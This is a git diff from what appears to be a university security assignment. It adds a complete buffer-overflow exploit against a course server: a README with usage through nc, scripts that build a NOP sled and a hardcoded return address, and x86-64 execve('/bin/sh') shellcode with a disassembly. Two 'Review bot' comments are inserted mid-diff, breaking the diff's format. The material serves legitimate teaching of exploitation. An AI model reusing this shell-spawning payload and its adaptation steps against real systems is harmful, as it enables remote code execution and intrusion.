Diffstat (limited to 'CamilStaps-s4498062-Assignment-4/ex1/exploit')
-rw-r--r-- | CamilStaps-s4498062-Assignment-4/ex1/exploit/README | 18 | ||||
-rw-r--r-- | CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit | bin | 0 -> 561 bytes | |||
-rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh | 16 | ||||
-rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh | 16 | ||||
-rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh | 4 | ||||
-rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh | 9 | ||||
-rwxr-xr-x | CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh | 17 |
7 files changed, 80 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/README b/CamilStaps-s4498062-Assignment-4/ex1/exploit/README
new file mode 100644
index 0000000..9e055de
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/README
@@ -0,0 +1,18 @@
+Usage: ./exploit.sh | nc hackme.cs.ru.nl 2288
+
+You start with control over input. Send EOF (ctrl+D) to send the exploit. Input control
+is then returned to you. Note that the shell will not echo a prompt. Just try some commands.
+
+If the exploit does not function out of the box, use the initial control to send format
+string (50 times %p). Get the desired return address from this (it's the 8 bytes before the
+stored frame pointer, 16 bytes before the current return address, in "int ret", right behind
+the buffer now recognizable by the run of 0x7025702570257025). Change the return address
+in genretaddr.sh. Run genexploit.sh to generate the new exploit. Note that the return address
+tends to drift, even with ASLR turned off. See genretaddr.sh for details.
+
+If the shellcode must be altered, do so in genshellcode.sh. If this also means the padding
+must be altered, change the number of NOPs in genexploit.sh (the first loop). If necessary,
+also alter the number of copies of the return address in genexploit.sh (the second loop).
+
+If you need more than a single try in one session (e.g. when ASLR is turned on), change
+exploit.sh to use the commented loop instead of `cat - exploit -`.
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit
Binary files differnew file mode 100644
index 0000000..4882996
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh
new file mode 100755
index 0000000..3c21d53
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/exploit.sh
@@ -0,0 +1,16 @@
+#!/bin/sh
+cat exploit -
+
+# cat - exploit - is the "best" way of doing this:
+#
+# It lets you explore the target using format strings, so that you can
+# craft your exploit into "exploit", execute it by sending EOF (ctrl+D),
+# and then once again you have direct input options.
+#
+# Can also solve this with a looping construct, for when you need more
+# than one try, e.g.
+#while [ 1 ]
+#do
+# cat -
+# cat exploit
+#done
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh
new file mode 100755
index 0000000..5d46c8f
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genexploit.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+./genretaddr.sh
+./gennop.sh
+./genshellcode.sh
+for i in {1..434}
+do
+ cat nop >> exploittmp
+done
+cat shellcode >> exploittmp
+for i in {1..12}
+do
+ cat retaddr >> exploittmp;
+done
+tr -d "\n" < exploittmp > exploit
+echo >> exploit
+rm shellcode retaddr nop exploittmp
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh
new file mode 100755
index 0000000..e2b0fe7
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/gennop.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+echo -e "\x90" > nop
+
+# Could also use a sled of pushes but that changes the stack so less elegant.
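Review bot: The command actually run in exploit.sh, `cat exploit -`, does not match the command its own comment and the README describe as the intended one, `cat - exploit -`, so the README's description of the interaction order (first interactive input, then the payload on EOF, then input again) does not correspond to what the script does. Either the command line or the comment and README should be changed so the three agree; as written a reader following the README will get different behaviour from the script. The whole of exploit.sh is visible in this hunk, so the mismatch is not explained elsewhere.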
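Review bot: genexploit.sh builds `exploittmp` with `>>` only and never truncates it, so if an earlier run aborted before the final `rm` (none of the `./gen*.sh` calls or `cat` writes are checked), the leftover bytes are silently prepended to the next output file. Adding `set -e` after the shebang and starting from an empty file (`: > exploittmp`, or a `mktemp` path removed via `trap`) makes the generator idempotent and makes a failed helper script visible instead of producing a corrupt file. The `;` after `cat retaddr >> exploittmp` is also inconsistent with the first loop and can be dropped.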
\ No newline at end of file
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh
new file mode 100755
index 0000000..1a741f2
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genretaddr.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+echo -e "\x70\xe4\xff\xff\xff\x7f\x00\x00" > retaddr
+
+# 0x00007fffffffe470
+
+# We've noticed that even with ASLR turned off, the correct return
+# address can drift a few hundred bytes. We haven't determined a
+# cause for this. Take this into consideration when creating, guiding
+# and grading the assignment.
diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
new file mode 100755
index 0000000..63fa491
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+echo -e "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" > shellcode
+
+# This shellcode translates as follows:
+#
+# "\x48\x31\xd2" // xor %rdx, %rdx
+# "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx
+# "\x48\xc1\xeb\x08" // shr $0x8, %rbx
+# "\x53" // push %rbx
+# "\x48\x89\xe7" // mov %rsp, %rdi
+# "\x52" // push %rdx // There is an error in the "original", push %rax will push
+# // some random stuff on the stack, instead of NULL, which will
+# // cause the execve to fail with EFAULT (-14). See man execve.
+# "\x57" // push %rdi
+# "\x48\x89\xe6" // mov %rsp, %rsi
+# "\xb0\x3b" // mov $0x3b, %al
+# "\x0f\x05" // syscall
\ No newline at end of file |